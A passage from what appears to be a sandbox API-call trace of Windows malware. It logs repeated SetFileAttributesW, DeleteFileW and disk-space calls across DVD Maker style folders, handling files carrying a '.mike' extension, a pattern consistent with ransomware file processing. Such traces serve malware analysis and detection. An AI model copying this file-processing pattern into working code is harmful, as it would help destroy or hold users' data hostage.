lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.892] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png", dwFileAttributes=0x80) returned 0 [0057.892] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-static.png.mike")) returned 1 [0057.893] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.900] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png", dwFileAttributes=0x80) returned 0 [0057.901] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-border.png.mike")) returned 1 [0057.902] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.906] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png", dwFileAttributes=0x80) returned 0 [0057.906] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-highlight.png.mike")) returned 1 [0057.908] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.911] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png", dwFileAttributes=0x80) returned 0 [0057.912] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-imagemask.png.mike")) returned 1 [0057.913] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.918] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png", dwFileAttributes=0x80) returned 0 [0057.918] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-shadow.png.mike")) returned 1 [0057.919] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.924] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png", dwFileAttributes=0x80) returned 0 [0057.924] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-backglow.png.mike")) returned 1 [0057.925] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.929] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png", dwFileAttributes=0x80) returned 0 [0057.929] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-border.png.mike")) returned 1 [0057.931] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.936] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png", dwFileAttributes=0x80) returned 0 [0057.936] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-imagemask.png.mike")) returned 1 [0057.937] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.948] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png", dwFileAttributes=0x80) returned 0 [0057.949] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_notes-txt-background.png.mike")) returned 1 [0057.950] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.955] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png", dwFileAttributes=0x80) returned 0 [0057.955] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\rollinghills.png.mike")) returned 1 [0057.956] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.980] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv", dwFileAttributes=0x80) returned 0 [0057.980] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg.wmv.mike")) returned 1 [0057.982] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.009] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv", dwFileAttributes=0x80) returned 0 [0058.009] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg_pal.wmv.mike")) returned 1 [0058.011] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.104] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv", dwFileAttributes=0x80) returned 0 [0058.104] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg.wmv.mike")) returned 1 [0058.109] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.445] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv.mike", lpFilePart=0x0) returned 0x4c [0058.503] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv", dwFileAttributes=0x80) returned 0 [0058.504] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg_pal.wmv.mike")) returned 1 [0058.510] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.616] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv", dwFileAttributes=0x80) returned 0 [0058.617] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref.wmv.mike")) returned 1 [0058.623] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.791] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv", dwFileAttributes=0x80) returned 0 [0058.792] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref_pal.wmv.mike")) returned 1 [0058.797] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0058.797] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.797] CoTaskMemFree (pv=0x4e1c10) [0058.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0058.805] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.818] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0058.818] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047x576black.png.mike")) returned 1 [0058.820] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.824] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png", dwFileAttributes=0x80) returned 0 [0058.824] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047_576black.png.mike")) returned 1 [0058.825] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.829] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0058.829] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_buttongraphic.png.mike")) returned 1 [0058.831] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.835] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0058.835] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_selectionsubpicture.png.mike")) returned 1 [0058.836] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.840] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0058.840] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_buttongraphic.png.mike")) returned 1 [0058.841] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.845] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0058.845] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_selectionsubpicture.png.mike")) returned 1 [0058.846] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.851] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0058.851] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_buttongraphic.png.mike")) returned 1 [0058.852] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.856] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0058.856] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_selectionsubpicture.png.mike")) returned 1 [0058.857] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.863] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png", dwFileAttributes=0x80) returned 0 [0058.863] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push.png.mike")) returned 1 [0058.867] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.870] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png", dwFileAttributes=0x80) returned 0 [0058.871] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\pushplaysubpicture.png.mike")) returned 1 [0058.872] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.878] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png", dwFileAttributes=0x80) returned 0 [0058.879] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_item.png.mike")) returned 1 [0058.880] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.884] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png", dwFileAttributes=0x80) returned 0 [0058.884] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_title.png.mike")) returned 1 [0058.885] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0058.885] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.885] CoTaskMemFree (pv=0x4e1c10) [0058.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0058.892] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.896] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0058.899] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576black.png.mike")) returned 1 [0058.900] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.904] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png", dwFileAttributes=0x80) returned 0 [0058.904] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576_91n92.png.mike")) returned 1 [0058.906] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.910] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png", dwFileAttributes=0x80) returned 0 [0058.910] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\15x15dot.png.mike")) returned 1 [0058.912] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.916] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png", dwFileAttributes=0x80) returned 0 [0058.916] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\720x480icongraphic.png.mike")) returned 1 [0058.917] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.921] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0058.921] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_buttongraphic.png.mike")) returned 1 [0058.923] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.927] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0058.927] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_selectionsubpicture.png.mike")) returned 1 [0058.929] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.987] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0058.987] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_buttongraphic.png.mike")) returned 1 [0058.989] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.992] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0058.993] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png.mike" 